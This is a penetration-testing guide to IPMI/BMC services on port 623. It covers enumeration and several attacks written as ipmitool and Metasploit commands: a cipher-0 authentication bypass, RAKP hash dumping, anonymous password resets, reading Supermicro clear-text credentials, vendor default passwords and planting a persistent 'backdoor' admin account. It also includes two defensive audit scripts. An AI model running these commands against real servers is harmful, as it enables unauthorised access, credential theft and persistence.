IPMI - Port 623/UDP/TCP

Basic info

The Intelligent Platform Management Interface (IPMI) is a standardized protocol developed by Intel in 1998 to facilitate remote management and monitoring of computer systems, regardless of their operating state. IPMI operates independently of the system's CPU, firmware, and operating system, enabling administrators to perform tasks such as system monitoring, recovery, and maintenance even when the system is powered off or unresponsive. This functionality is primarily managed through the Baseboard Management Controller (BMC), a dedicated microcontroller embedded on the motherboard.

Default Ports: IPMI-over-LAN runs over the RMCP/RMCP+ transport, which listens on UDP port 623; some BMCs also expose TCP port 623.

Enumerating IPMI Services

Effective enumeration of IPMI services is crucial for identifying potential vulnerabilities. The following methodologies and tools are instrumental in this process:

Network Scanning with Nmap

Nmap can be employed to detect active IPMI services on a network:

nmap -n -p 623 <target-subnet>        # TCP probe
nmap -n -sU -p 623 <target-subnet>    # UDP probe (where RMCP/IPMI normally listens)

The first command probes TCP port 623 and the second probes UDP port 623; a host answering on UDP 623 is almost certainly running an IPMI service. The -n flag skips reverse DNS lookups so the scan does not leak hostnames or stall on resolution.

Identifying IPMI Version

Determining the IPMI version can provide insights into potential vulnerabilities:

nmap -sU --script ipmi-version -p 623 <target-ip>

Alternatively, the Metasploit auxiliary module can be utilized:

use auxiliary/scanner/ipmi/ipmi_version

Common IPMI Vulnerabilities

Several vulnerabilities have been identified in IPMI implementations that could be exploited during penetration testing:

Cipher 0 Authentication Bypass

A critical flaw in IPMI 2.0 involves cipher suite 0, which specifies no authentication, integrity or confidentiality algorithms. When a BMC permits this suite, a client that selects cipher 0 and supplies a valid username is granted a session regardless of the password it sends:

ipmitool -I lanplus -C 0 -H <target-ip> -U <username> -P <password> user list

This command lists user accounts without proper authentication, highlighting the severity of the vulnerability.
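As an added defender-side check, not part of the original page, the following Python script parses the output of `ipmitool lan print <channel>` and reports cipher suites 0, 1 and 2 when the BMC still allows them (0 is the bypass; 1 and 2 authenticate but carry no encryption), then builds the `ipmitool lan set <channel> cipher_privs` line that disables those slots. The sample output is constructed to follow ipmitool's layout rather than captured from a real BMC, and the LAN channel number 1 is an assumption; check which channel your BMC uses.

```python
import sys

# Constructed sample of `ipmitool lan print 1` output following ipmitool's
# layout; it is not captured from a real BMC. The cipher lines are what matter.
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12,17
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

# Suites that must never be reachable from the network:
#   0 = no authentication, no integrity, no confidentiality (the bypass)
#   1 = password-based authentication only, no integrity, no confidentiality
#   2 = authentication + integrity, still no confidentiality
WEAK_SUITES = {0: "authentication bypass", 1: "no encryption", 2: "no encryption"}


def parse_lan_print(text):
    """Return (enabled_suites, priv_max) from `ipmitool lan print` output."""
    suites, priv_max = [], ""
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key = key.strip()
        if key == "RMCP+ Cipher Suites":
            suites = [int(s) for s in value.split(",") if s.strip()]
        elif key == "Cipher Suite Priv Max":
            # One character per suite 0..14: 'X' = disabled, otherwise the
            # maximum privilege level allowed to use the suite (c/u/o/a/O).
            priv_max = value.strip()
    return suites, priv_max


def audit_ciphers(text):
    """List (suite, reason) for every weak suite the BMC still permits."""
    suites, priv_max = parse_lan_print(text)
    findings = []
    for suite in suites:
        if suite in WEAK_SUITES and suite < len(priv_max) and priv_max[suite] != "X":
            findings.append((suite, WEAK_SUITES[suite]))
    return findings


def remediation_command(text, channel=1):
    """Build the `ipmitool lan set` line that sets the weak slots to X."""
    _, priv_max = parse_lan_print(text)
    chars = list(priv_max.ljust(15, "X")[:15])  # exactly 15 slots, suites 0..14
    for suite in WEAK_SUITES:
        chars[suite] = "X"
    return f"ipmitool lan set {channel} cipher_privs {''.join(chars)}"


if __name__ == "__main__":
    # Usage: ipmitool lan print 1 | python3 ipmi_cipher_audit.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LAN_PRINT
    findings = audit_ciphers(text)
    for suite, reason in findings:
        print(f"cipher suite {suite} enabled: {reason}")
    if findings:
        print("fix:", remediation_command(text))
```

Run it against each BMC's `lan print` output from a management jump host; a clean result is an empty findings list. Apply the generated `cipher_privs` line and re-run the audit to confirm the slots now read X.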

Retrieval of Password Hashes via RAKP

The Remote Authenticated Key-Exchange Protocol (RAKP) in IPMI 2.0 contains a design flaw: during session setup the BMC returns an HMAC keyed with the requested user's password before the client has proven anything, so anyone who can reach the service can retrieve password hashes of valid users. These hashes can then be subjected to offline brute-force attacks to recover plaintext passwords. Metasploit provides a module to exploit this vulnerability:

use auxiliary/scanner/ipmi/ipmi_dumphashes

Successful execution retrieves hashed credentials, emphasizing the need for robust password policies. Because the leak is inherent to the RAKP design rather than a vendor bug, no firmware update removes it; the mitigations are long, random BMC passwords and keeping port 623 reachable only from a dedicated management network.

Anonymous Authentication

Some IPMI implementations allow anonymous authentication with null usernames and passwords. This misconfiguration can be exploited to perform unauthorized actions, such as resetting user passwords:

ipmitool -I lanplus -H <target-ip> -U '' -P '' user set password <user-id> <new-password>

This command resets the password for the specified user ID without proper authentication.

Clear-Text Password Storage in Supermicro BMCs

Supermicro's IPMI implementation has been found to store administrator credentials in clear text within the BMC's filesystem, specifically in files like /nv/PSBlock. Attackers with access to the BMC can retrieve these credentials:

cat /nv/PSBlock

This practice poses significant security risks and underscores the importance of securing BMC access.

Brute Force

HP randomizes the default password for its Integrated Lights Out (iLO) product during manufacture. This practice contrasts with other manufacturers, who tend to use static default credentials. A summary of default usernames and passwords for various products is provided as follows:

  • HP Integrated Lights Out (iLO) uses a factory randomized 8-character string as its default password, showcasing a higher security level.

  • Products like Dell's iDRAC, IBM's IMM, and Fujitsu's Integrated Remote Management Controller use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.

  • Similarly, Supermicro IPMI (2.0), Oracle/Sun ILOM, and ASUS iKVM BMC also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.

Introducing Backdoors into BMC from the Host

Upon compromising a host equipped with a BMC, the local BMC interface can be leveraged to insert a backdoor user account, creating a lasting presence on the server. This attack necessitates the presence of ipmitool on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.

ipmitool user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            true    false      false      Unknown (0x00)
3   root             true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4          # privilege level 4 = ADMINISTRATOR
ipmitool user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            true    false      false      Unknown (0x00)
3   root             true    false      false      Unknown (0x00)
4   backdoor         true    false      true       ADMINISTRATOR
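The anonymous-authentication and backdoor-account scenarios above share one detection: dump `ipmitool user list` from each host (or over the network) on a schedule and compare it with the accounts you expect. The Python script below is an added example, not part of the original page; it parses that table, flags the blank-name anonymous slot whenever it is enabled or holds any privilege, and flags every account outside an assumed allowlist (here `ADMIN` and `root`). The sample output is constructed from the session on this page plus an anonymous row and is not captured from a real BMC.

```python
import re
import sys

# Constructed sample of `ipmitool user list` output, built from the session on
# this page plus the blank-name anonymous slot (ID 1); not captured from a real BMC.
SAMPLE_USER_LIST = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      NO ACCESS
2   ADMIN            true    false      false      Unknown (0x00)
3   root             true    false      false      Unknown (0x00)
4   backdoor         true    false      true       ADMINISTRATOR
"""

# Assumed allowlist: the BMC accounts your fleet is supposed to have.
ALLOWED_USERS = {"ADMIN", "root"}

# The Name column is empty for the anonymous user, so it is optional here.
ROW = re.compile(
    r"^\s*(?P<id>\d+)\s+(?:(?P<name>\S+)\s+)?"
    r"(?P<callin>true|false)\s+(?P<link>true|false)\s+(?P<msg>true|false)\s+"
    r"(?P<priv>.+?)\s*$"
)


def parse_user_list(text):
    """Parse ipmitool's user table; the header and blank lines are skipped."""
    users = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        users.append({
            "id": int(m["id"]),
            "name": m["name"] or "",          # '' marks the anonymous slot
            "ipmi_msg": m["msg"] == "true",   # usable over IPMI messaging?
            "priv": m["priv"],
        })
    return users


def audit_users(text, allowed=ALLOWED_USERS):
    """Return findings for an enabled anonymous slot and for unexpected accounts."""
    findings = []
    for u in parse_user_list(text):
        if u["name"] == "":
            # Anonymous slot: acceptable only if disabled with no privilege.
            if u["ipmi_msg"] or u["priv"] != "NO ACCESS":
                findings.append(f"id {u['id']}: anonymous user enabled (priv {u['priv']})")
        elif u["name"] not in allowed:
            remote = "enabled" if u["ipmi_msg"] else "disabled"
            findings.append(
                f"id {u['id']}: unexpected account '{u['name']}', "
                f"priv {u['priv']}, IPMI messaging {remote}"
            )
    return findings


if __name__ == "__main__":
    # Usage: ipmitool user list | python3 ipmi_user_audit.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_USER_LIST
    for finding in audit_users(text):
        print(finding)
```

Because the local interface needs no credentials, this check is best run by the host's own configuration-management agent and shipped to your SIEM; an account appearing between two runs is the signal, and the allowlist should be maintained per hardware model rather than hard-coded as it is here.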
